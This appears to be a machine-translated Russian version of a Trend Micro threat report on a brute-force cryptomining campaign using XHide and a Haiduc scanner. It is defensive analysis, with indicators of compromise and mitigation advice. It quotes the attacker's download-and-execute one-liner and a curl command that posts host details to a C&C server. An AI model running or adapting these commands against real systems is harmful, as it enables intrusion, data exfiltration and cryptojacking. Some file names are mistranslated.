Bitcoin miner взлом

cryptocurrency-miner-haiduc-xhide-brute-force-серверыАугусто Ремильяно II и Джемима Молина (аналитики угроз)
Trend Micro honeypot обнаружил угрозу майнинга криптовалют на скомпрометированном сайте, где URL-адрес hxxps://upajmeter[.]com/assets/.style/min был использован майнером для размещения команды загрузки основного скрипта оболочки (обнаружен Trend Micro как Trojan.SH.MALXMR.UWEJS). Cryptocurrency-miner, многокомпонентная угроза, состоящая из различных скриптов Perl и Bash, двоичных файлов майнера, приложения hider Xhide и инструмента сканера, распространяется путем сканирования уязвимых машин и грубого принуждения (в основном по умолчанию) учетных данных.

Анализ угрозы показал, что субъект угрозы, стоящий за вредоносной активностью, выполняет файлы компонентов, которые запускаются несколько раз в день, так что состояние зараженной машины регулярно отправляется на командно-контрольный сервер (C&C). Сценарий оболочки, используемый при заражении, также способен загружать архивные файлы, содержащие сканер майнера, hider и конечную полезную нагрузку.

Угроза также использует скрытие процесса для сокрытия двоичного файла майнера, что делает типичного пользователя более маловероятным, чтобы заметить активность майнинга, за исключением снижения производительности и подозрительного сетевого трафика.

Этот метод был известным прикрытием для субъектов угроз, которые стремятся сканировать, применять грубую силу и минировать.

Старые инструменты для новых денег: URL Spreading Shellbot и XMRig с использованием 17-летнего XHide

Мы обнаружили угрозу, которая распространяется путем сканирования открытых портов и грубого принуждения слабых учетных данных, установки майнера криптовалюты Monero и IRC-бэкдора на основе Perl в качестве конечной полезной нагрузки. Процесс майнера скрыт с помощью XHide Process Faker, 17-летнего инструмента с открытым исходным кодом, используемого для подделки имени процесса.

Инфекция

Злоумышленник начинает с получения доступа к машине через слабые или стандартные учетные данные. Затем на скомпрометированной машине будет запущена команда:

cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl -O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*

Начальный файл min (обнаружен как Trojan.Perl.MALXMR.UWEJS) загружает другой файл min.sh (обнаружен как Trojan.SH.MALXMR.UWEJS), который является основным скриптом оболочки, устанавливающим различные компоненты этой угрозы. После выполнения основного скрипта оболочки он попытается убить существующие процессы майнинга криптовалют:

killall -9 rand rx rd tsm tsm2 haiduc a sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr python cron ntpd start start.sh libssl sparky.sh

Сценарий оболочки также загружает и выполняет загрузчики файлов компонентов cron.sh и nano.sh (Trojan.SH.MALXMR.UWEJT), которые выполняются ежедневно по часам и каждые 30 минут соответственно. Эти файлы выпадают rcmd.sh (обнаружен как Trojan.SH.MALXMR.UWEJU), который отвечает за регулярное сообщение C&C через HTTP post-запрос о состоянии зараженной машины:

curl -d "info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc) PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)" hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null

Архивные файлы

Сценарий оболочки также способен загружать и извлекать архив майнера monero.tgz (обнаруженный как Trojan.Linux.MALXMR.UWEJS) для выполнения его содержимого. Архивный файл содержит двоичные файлы майнера, которые могут быть выполнены различными скриптами shell и Perl, которые также содержатся в файле.

Содержимое архивного файла — это в основном конфигурационные файлы и те, которые выполняют различные файлы компонентов, такие как

config.txt, cpu.txt, h32 (Xhide 32-bit), h64 (Xhide 64-bit), pools.txt, run, startMSR, x, x.pl, xmr-stakи xmrig. Двоичный файл Xhide отвечает за скрытие процессов майнинга криптовалют путем изменения имен процессов на “-bash”.

Затем основной сценарий оболочки загружает и извлекает архив сканера sslm.tgz (обнаружен как Trojan.Linux.SSHBRUTE.Увейс) для исполнения. В архиве хранится двоичный файл сканера Telnet/SSH, соответствующие скрипты оболочки и Perl, которые будут его выполнять, а также список паролей, которые будут использоваться для сканирования.

Шеллбот на основе Perl ищет целевые организации через C&C

Мы раскрыли операцию хакерской группы, которую мы называем “вне закона” (перевод происходит от румынского слова haiduc, хакерского инструмента, который группа в основном использует), включающую использование IRC-бота, построенного с помощью Perl Shellbot.

Содержимое архива сканера включает в себя .pass (короткий список паролей, используемый для случайных публичных IP-блоков), pass (длинный список паролей, используемый для частных IP-блоков), libssl (UPX-упакованный сканер Haiduc), sparky.sh, начало, start.pl, и start.sh.

Сканер попытается заразить и получить контроль над устройствами в частном IP-диапазоне (он попытается заразить все устройства в той же локальной сети, что и хост-машина), грубо заставив список учетных данных, которые содержат 3637 комбинаций имени пользователя и пароля.

Он также пытается заразить устройства в общедоступном диапазоне IP, используя другой, более короткий список учетных данных. Судя по используемым учетным данным, атака в основном нацелена на серверы, связанные с базами данных, хранилищами данных, игровыми и горнодобывающими установками.

В случае успеха злоумышленник сможет выдавать вышеупомянутые команды для майнинга криптовалют.

Защита устройств от угроз майнинга криптовалют

Участники угрозы, стоящие за этим криптовалютным майнером, использовали Haiduc и Xhide, известные и старые инструменты, которые, как известно, использовались для различных вредоносных действий. Эти инструменты в сочетании с грубыми слабыми учетными данными могут сохраняться в системах, работающих под радаром традиционных решений сетевой безопасности. Такие вредоносные программы также могут влиять на производительность системы и подвергать пользователей другим формам компрометации.

Хотя мы еще не видели широко распространенных атак от этого субъекта угрозы, пользователи должны принять меры безопасности, которые могут защитить системы от любых потенциальных атак, таких как:

  • Будьте осторожны с известными векторами атак, такими как нежелательные электронные письма, социально спроектированные ссылки и вложения, подозрительные веб-сайты и сомнительные сторонние приложения.
  • Изменение учетных данных устройств по умолчанию для предотвращения несанкционированного доступа
  • Обновление устройств с помощью последних патчей
  • Регулярная проверка того, что все созданные учетные записи используются только в законных целях

Пользователи также могут рассмотреть возможность принятия решений безопасности, которые могут обеспечить защиту от вредоносных действий, связанных с ботом, с помощью межпоколенного сочетания методов защиты от угроз. Trend Micro™ XGen™ security обеспечивает высококачественное машинное обучение, которое может обеспечить безопасность шлюза и конечных точек, а также защищать физические, виртуальные и облачные рабочие нагрузки. Благодаря технологиям, использующим фильтрацию веб-адресов, поведенческий анализ и пользовательскую песочницу, XGen security обеспечивает защиту от постоянно меняющихся угроз, которые обходят традиционные средства управления и используют известные и неизвестные уязвимости. XGen security также поддерживает набор решений безопасности Trend Micro: гибридную облачную безопасность, защиту пользователейи сетевую защиту.

Пользователи Trend Micro™ Deep Discovery Inspector (DDI) защищены от этой угрозы с помощью этих правил, которые охватывают сетевой трафик майнинга и подключение C&C соответственно:

  • Правило 2573: майнер — TCP (запрос)
  • Правило 4313 — MALXMR — HTTP (запрос)

Индикаторы компромисса (МОК)

SHA-256

Имена файловХэшиTrend Micro Pattern DetectionПримечания
config.txt91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906Trojan.Win32.MALXMR.BJКонфигурационный файл
cpu.txt60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53aTrojan.Win32.MALXMR.BJКонфигурационный файл
cron.shfee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22eTrojan.SH.MALXMR.UWEJTЗагрузка файла компонента
h3245ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161HackTool.Linux.XHide.GAXhide binary (32-бит)
h647fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eafHackTool.Linux.XHide.GAXhide binary (64-битный)
libssl6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4128f4fb6a4HackTool.Linux.SSHBRUTE.GAСканер Haiduc (UPX упакован)
минута07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861abTrojan.Perl.MALXMR.UWEJSЗагружает основной сценарий оболочки
min.sh3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460Trojan.SH.MALXMR.UWEJSОсновной сценарий оболочки
monero.tgzeb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544Trojan.Linux.MALXMR.UWEJSАрхив майнеров
nano.shfee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22eTrojan.SH.MALXMR.UWEJTЗагрузка файла компонента
pools.txtcd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57Trojan.Win32.MALXMR.BJКонфигурационный файл
rcmd.sh46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccffТроян.Ш.МАЛКСМР.УВЕЮОтчеты в C&C
бежать420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1Trojan.SH.MALXMR.UWEJWВыполняет компонент miner и hider
sparky.sh64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18Троян.Ш.ШШБРЮТ.UWEJSВыполняет компонент сканера
sslm.tgz8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5fTrojan.Linux.SSHBRUTE.UWEJSАрхив сканера
начало5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659bТроян.Ш.ШШБРЮТ.UWEJSВыполняет файл компонента
start.shd75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049Троян.Ш.ШШБРЮТ.UWEJSВыполняет файл компонента
startMSR473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacbTrojan.SH.MALXMR.UWEJWВыполняет компонент miner и hider
икс78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4dТроян.Ш.МАЛКСМР.УвейсВыполняет файл компонента
xmr-stak8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4cCoinminer.Linux.MALXMR.UWEKFМайнер бинарных опционов
xmrige41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abbCoinminer.Linux.MALXMR.SMDSL64Майнер бинарных опционов

Связанные вредоносные URL-адреса

139[.]99[.]42[.]75:3333

pool[.]masari[.]hashvault[.]pro:3333

hxxps://upajmeter[.]com/assets/.style/min

hxxps://upajmeter[.]com/assets/.style/min.sh

hxxps://upajmeter[.]com/assets/.style/remote/cron.sh

hxxps://upajmeter[.]com/assets/.style/monero.tgz

hxxps://upajmeter[.]com/assets/.style/sslm.tgz

hxxps://upajmeter[.]com/assets/.style/remote/info.php

hxxps://upajmeter[.]com/assets/.style/remote/rcmd.sh

СКРЫТЬ

Нравится? Добавьте эту инфографику на свой сайт:
1. Нажмите на поле ниже. 2. нажмите Ctrl+A, чтобы выбрать все. 3. нажмите Ctrl+C, чтобы скопировать. 4. вставьте код на страницу (Ctrl+V).

Изображение будет иметь тот же размер, что и выше.